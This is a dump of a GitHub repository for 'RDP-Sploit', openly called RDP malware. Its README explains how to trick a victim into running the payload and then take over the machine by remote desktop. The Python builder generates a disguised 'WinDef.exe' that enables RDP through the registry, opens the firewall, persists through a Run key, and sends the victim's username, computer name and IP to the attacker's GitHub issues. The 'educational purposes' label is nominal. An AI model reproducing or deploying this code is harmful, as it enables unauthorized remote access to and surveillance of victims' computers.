├── CHANGELOG.md ├── RDPSploit.png ├── README.md ├── bin └── rdp-sploit.py └── rdp-sploit.exe /CHANGELOG.md: -------------------------------------------------------------------------------- 1 | # v0.3 (Current) 2 | 3 | - One File Payload 4 | - New command `mstsc` and `data` added 5 | - Doesn't Delete tool folder 6 | - Added new file System so you can keep unlimited files 7 | 8 | # previous versions 9 | 10 | - Two File Payload 11 | - Delete's tool folder 12 | - can keep upto one file only 13 | - process fails when the script is in Desktop/RDP-Sploit or Desktop/RDP-Sploit/Client 14 | -------------------------------------------------------------------------------- /RDPSploit.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/D4RKH0R1Z0N/RDP-SPLOIT/1b4d0acf078c526ebf5da31f0f0ece7f90cca756/RDPSploit.png -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 |
2 |

3 | 4 | Logo 5 | 6 | 7 |

RDP-Sploit

8 | 9 |

10 | RDP Malware
Made Only For Educational Purposes 11 |
12 |
13 |

14 |

15 | 16 | 17 | 18 | ## Table Of Contents 19 | 20 | * [About the Project](#about-the-project) 21 | * [Built With](#built-with) 22 | * [Getting Started](#getting-started) 23 | * [Prerequisites](#prerequisites) 24 | * [Installation](#installation) 25 | * [Usage](#usage) 26 | * [Authors](#authors) 27 | 28 | ## About The Project 29 | 30 | RDP-Sploit is a Tool built for Windows RDP Malware it enables RDP in the Victim Machine and Send the Info of the Victim to the Attacker (You) 31 | 32 | ## Built With 33 | 34 | Also This is Build with GitHub API so You Will need a GitHub Token and give it repo permission. [Click Here to View How to Create a GitHub Token](https://docs.github.com/en/enterprise-cloud@latest/authentication/keeping-your-account-and-data-secure/creating-a-personal-access-token) 35 | 36 | ## Getting Started 37 | 38 | How to Install 39 | 40 | ### Prerequisites 41 | 42 | We just need pyinstaller! only one package do the following command below to install it! 43 | ``` 44 | pip install pyinstaller 45 | ``` 46 | 47 | ### Installation 48 | 49 | Installation - 50 | 51 | ``` 52 | git clone https://github.com/D4RKH0R1Z0N/rdp-sploit && cd rdp-sploit && cd bin && python rdp-sploit.py 53 | ``` 54 | 55 | ## Usage 56 | 57 | After Installation and running the script now type create or payload in the script, now Enter the information the Script Asks you (It need to be valid for it to work)

Now Go to the location that the script showed you, and make the victim execute it, it will prompt a uac asking to grant admin permission and click yes now goto your repo on github and click the issue tab copy the IP address and type `mstsc` and wait for the application to open.

Now enter the IP Address, if it asks you for the username enter the name given in the issue title where the ip address is, if you can't find it follow this format (username - pc_name - ip address) Now connect to RDP and that's all You hacked the victim! 58 | 59 | | Status (Client) | Status (Server) | 60 | | --------------- | --------------- | 61 | | Not Tested | Works (Windows 11) | 62 | 63 | ## Authors 64 | 65 | * **D4RKH0R1Z0N** - ** - **[D4RKH0R1Z0N](https://github.com/D4RKH0R1Z0N/)** - ** 66 | -------------------------------------------------------------------------------- /bin/rdp-sploit.py: -------------------------------------------------------------------------------- 1 | # Made by D4RKH0R1Z0N (https://github.com/D4RKH0R1Z0N) 2 | # Star the repo at (https://github.com/D4RKH0R1Z0N/rdp-sploit) Made In Python 3 | 4 | import os 5 | import random 6 | import shutil 7 | from time import sleep 8 | from sys import exit as closeprogram 9 | from sys import platform 10 | import string 11 | 12 | username = os.getlogin() 13 | desk_path = "C:/Users/" + username + "/Desktop" 14 | 15 | def randstr(length): 16 | char_list = string.ascii_lowercase 17 | return ''.join(random.choice(char_list) for i in range(length)) 18 | 19 | def tool_path_c(): 20 | tool_path = desk_path + "/rdp-sploit" 21 | 22 | if os.path.exists(tool_path) and os.path.isdir(tool_path): 23 | os.chdir(tool_path) 24 | tool_path = tool_path + "/client" 25 | if os.path.exists(tool_path) and os.path.isdir(tool_path): 26 | os.chdir(tool_path) 27 | else: 28 | os.mkdir("client") 29 | else: 30 | os.mkdir("rdp-sploit") 31 | tool_path = desk_path + "/rdp-sploit" 32 | os.chdir(tool_path) 33 | os.mkdir("client") 34 | tool_path = desk_path + "/rdp-sploit/client" 35 | os.chdir(tool_path) 36 | 37 | if platform == "win32": 38 | os.system("cls") 39 | access_token = input("Please Enter Your GitHub Token : ") 40 | git_name = input("Please Enter Your GitHub Username : ") 41 | repo_name = input("Please Enter Your Repo Name : ") 42 | os.system("cls") 43 | print("WARNING : THIS SCRIPT IS MADE FOR EDUCATIONAL PURPOSE ONLY") 44 | print("") 45 | print("YOU HAVE BEEN WARNED!") 46 | sleep(2) 47 | os.system("cls") 48 | 49 | print("Note : The Info of the Victim will be Uploaded to Your Repo, To access it go to the issues tab and the info will be given in the title") 50 | print("This is the Info Format (Username - Computer_Name - IP_Address)") 51 | 52 | def create_payload(): 53 | tool_path_c() 54 | print("") 55 | print("Please Wait Creating Payload...") 56 | file_name = "client-" + randstr(7) + ".py" 57 | 58 | if os.path.exists(file_name) and os.path.isfile(file_name): 59 | file_name = "client-" + randstr(7) + ".py" 60 | 61 | main_file = file_name 62 | main_file_exe = main_file.replace(".py", ".exe") 63 | spec_file = main_file.replace(".py", ".spec") 64 | 65 | def del_build_data(): 66 | dist_path = "C:/Users/" + username + "/Desktop" + "/rdp-sploit/client/dist" 67 | home_path = "C:/Users/" + username + "/Desktop" + "/rdp-sploit/client/" 68 | build_path = "C:/Users/" + username + "/Desktop" + "/rdp-sploit/client/build" 69 | if os.path.exists(build_path) and os.path.isdir(build_path): 70 | shutil.rmtree(build_path) 71 | build_path = "C:/Users/" + username + "/Desktop" + "/rdp-sploit/client/__pycache__" 72 | if os.path.exists(build_path) and os.path.isdir(build_path): 73 | shutil.rmtree(build_path) 74 | dst_1 = "C:/Users/" + username + "/Desktop" + "/rdp-sploit/client/" + main_file_exe 75 | os.remove(spec_file) 76 | os.chdir(dist_path) 77 | os.rename(main_file_exe, dst_1) 78 | os.chdir(home_path) 79 | build_path = "C:/Users/" + username + "/Desktop" + "/rdp-sploit/client/dist" 80 | if os.path.exists(build_path) and os.path.isdir(build_path): 81 | shutil.rmtree(build_path) 82 | 83 | client_file = open(main_file, "w") 84 | file_loc = "C:/Users/" + username + "/Desktop" + "/rdp-sploit/client/" + main_file_exe 85 | payload_data = """from socket import gethostname, gethostbyname 86 | from requests import post 87 | from json import dump as dump_data 88 | import os 89 | import PyInstaller.__main__ 90 | import shutil 91 | 92 | access_token = """ + access_token + """ 93 | username = """ + git_name + """ 94 | repo_name = """ + repo_name + """ 95 | 96 | dst = "C:/Windows/System32" 97 | os.chdir(dst) 98 | os.system(""" + '"""' + """reg add """ + '"' + "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" + '"' + """ /v fDenyTSConnections /t REG_DWORD /d 0 /f""" + '"""' + """) 99 | os.system(""" + '"""' + """netsh advfirewall firewall set rule group=""" + '"' + "remote desktop" + '"' + """ new enable=Yes""" + '"""' + """) 100 | os.system(""" + '"""' + """ reg add """ + '"' + "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" + '"' + """ /t REG_SZ /d""" + '"' + "C:/Windows/System32/WinDef/WinDef.exe" + '"' + ' ' + '"""' + """) 101 | token = """ + '"' + access_token + '"' +""" 102 | pc_name = gethostname() 103 | client_ip = gethostbyname(pc_name) 104 | nickname = getlogin() 105 | headers = {"Authorization" : "token {}".format(token)} 106 | info = {"title": nickname + " - " + pc_name + " - " + client_ip} 107 | username = """ + '"' + git_name + '"' + """ 108 | Repositoryname = """ + '"' + repo_name + '"' + """ 109 | url = "https://api.github.com/repos/{}/{}/issues".format(username,Repositoryname) 110 | post(url,data=dump_data(info),headers=headers) 111 | 112 | payload = open("WinDef.py", "w") 113 | data = """ + '"""' + """from socket import gethostname, gethostbyname 114 | from requests import post 115 | from json import dump as dump_data 116 | from os import getlogin, system 117 | 118 | system(""" + '"""' + """reg add """ + '"' + "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" + '"' + """ /v fDenyTSConnections /t REG_DWORD /d 0 /f""" + '"""' + """) 119 | system(""" + '"""' + """netsh advfirewall firewall set rule group=""" + '"' + "remote desktop" + '"' + """ new enable=Yes""" + '"""' + """) 120 | system(""" + '"""' + """ reg add """ + '"' + "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" + '"' + """ /t REG_SZ /d""" + '"' + "C:/Windows/System32/WinDef/WinDef.exe" + '"' + ' ' + '"""' + """) 121 | token = """ + '"' + access_token + '"' +""" 122 | pc_name = gethostname() 123 | client_ip = gethostbyname(pc_name) 124 | nickname = getlogin() 125 | headers = {"Authorization" : "token {}".format(token)} 126 | info = {"title": nickname + " - " + pc_name + " - " + client_ip} 127 | username = """ + '"' + username + '"' + """ 128 | Repositoryname = """ + '"' + repo_name + '"' + """ 129 | url = "https://api.github.com/repos/{}/{}/issues".format(username,Repositoryname) 130 | post(url,data=dump_data(info),headers=headers)""" + '"""' + """exitexit 131 | exit 132 | 133 | payload.write(data) 134 | payload.close 135 | 136 | PyInstaller.__main__.run([ 137 | 'WinDef.py', 138 | '--onefile', 139 | '--uac-admin', 140 | '--noconfirm', 141 | '--windowed' 142 | ]) 143 | 144 | build_path = "C:/Windows/System32/build" 145 | if os.path.exists(build_path) and os.path.isdir(build_path): 146 | shutil.rmtree(build_path) 147 | build_path = "C:/Windows/System32/__pycache__" 148 | if os.path.exists(build_path) and os.path.isdir(build_path): 149 | shutil.rmtree(build_path) 150 | os.remove("WinDef.spec") 151 | os.remove("WinDef.py") 152 | os.rename("dist", "WinDef") 153 | os.chdir("C:/Windows/System32/WinDef") 154 | os.system("WinDef.exe")""" 155 | 156 | client_file.write(payload_data) 157 | client_file.close 158 | os.system("cls") 159 | print("Done... Converting...") 160 | sleep(0.8) 161 | os.system("""pyinstaller --noconfirm --onefile --windowed --uac-admin """ + main_file) 162 | os.system("cls") 163 | print("Cleaning Up and Fixing Files...") 164 | del_build_data() 165 | os.chdir(desk_path) 166 | print("File's saved at : " + file_loc) 167 | print("") 168 | print("Note : The Info of the Victim will be Uploaded to Your Repo, To access it go to the issues tab and the info will be given in the title") 169 | print("This is the Info Format (Username - Computer_Name - IP_Address)") 170 | 171 | brand = """ 172 | _ _ _ _ 173 | _ __ __| |_ __ ___ _ __ | | ___ (_| |_ 174 | | '__/ _` | '_ \ _____/ __| '_ \| |/ _ \| | __| 175 | | | | (_| | |_) |_____\__ | |_) | | (_) | | |_ 176 | |_| \__,_| .__/ |___| .__/|_|\___/|_|\__| 177 | |_| |_| 178 | """ 179 | 180 | def banner(): 181 | print(brand) 182 | print("") 183 | print("Your Using RDP-Sploit v1.0") 184 | print("Made by D4RKH0R1Z0N (https://github.com/D4RKH0R1Z0N/)") 185 | print("") 186 | 187 | def main_menu(): 188 | input_1 = input("(RDP-Sploit)> ") 189 | input_1 = input_1.lower() 190 | if input_1 == "credits": 191 | print("") 192 | print("Made by D4RKH0R1Z0N (https://github.com/D4RKH0R1Z0N/)") 193 | main_menu() 194 | elif input_1 == "create" or input_1 == "payload": 195 | create_payload() 196 | main_menu() 197 | elif input_1 == "clear": 198 | os.system("cls") 199 | main_menu() 200 | elif input_1 == "mstsc": 201 | print("Opening Please Wait....") 202 | print("Note : Data should be entered manually...") 203 | sleep(1) 204 | os.system("cls") 205 | print("Close the program to Use this Application") 206 | os.system("mstsc") 207 | os.system("cls") 208 | main_menu() 209 | elif input_1 == "data": 210 | data_link = "https://github.com/" + git_name + "/" + repo_name + "/issues" 211 | print("Opening Info...") 212 | data_ = "start " + data_link 213 | os.system(data_) 214 | os.system("cls") 215 | main_menu() 216 | elif input_1 == "help": 217 | print("") 218 | print("help - Show help menu") 219 | print("payload / create - Create Payload") 220 | print("mstsc - Start RDP Connection") 221 | print("data - Show the collected Info") 222 | print("clear - clear's the console") 223 | print("exit - exit the application") 224 | print("") 225 | print("Note : The Info of the Victim will be Uploaded to Your Repo, To access it go to the issues tab and the info will be given in the title") 226 | print("This is the Info Format (Username - Computer_Name - IP_Address)") 227 | print("") 228 | main_menu() 229 | elif input_1 == "exit": 230 | os.system("cls") 231 | banner() 232 | print("") 233 | print("Bye Bye! Meet you Soon Again! :)") 234 | sleep(2) 235 | closeprogram() 236 | else: 237 | print("Please enter a Correct command from below!") 238 | print("") 239 | print("help - Show help menu") 240 | print("payload / create - Create Payload") 241 | print("mstsc - Start RDP Connection") 242 | print("data - Show the collected Info") 243 | print("clear - clear's the console") 244 | print("exit - exit the application") 245 | print("") 246 | print("Note : The Info of the Victim will be Uploaded to Your Repo, To access it go to the issues tab and the info will be given in the title") 247 | print("This is the Info Format (Username - Computer_Name - IP_Address)") 248 | print("") 249 | main_menu() 250 | 251 | def start(): 252 | banner() 253 | print("") 254 | print("help - Show help menu") 255 | print("payload / create - Create Payload") 256 | print("mstsc - Start RDP Connection") 257 | print("data - Show the collected Info") 258 | print("clear - clear's the console") 259 | print("exit - exit the application") 260 | print("") 261 | main_menu() 262 | 263 | start() 264 | else: 265 | print("Please run this in Windows!") 266 | -------------------------------------------------------------------------------- /rdp-sploit.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/D4RKH0R1Z0N/RDP-SPLOIT/1b4d0acf078c526ebf5da31f0f0ece7f90cca756/rdp-sploit.exe --------------------------------------------------------------------------------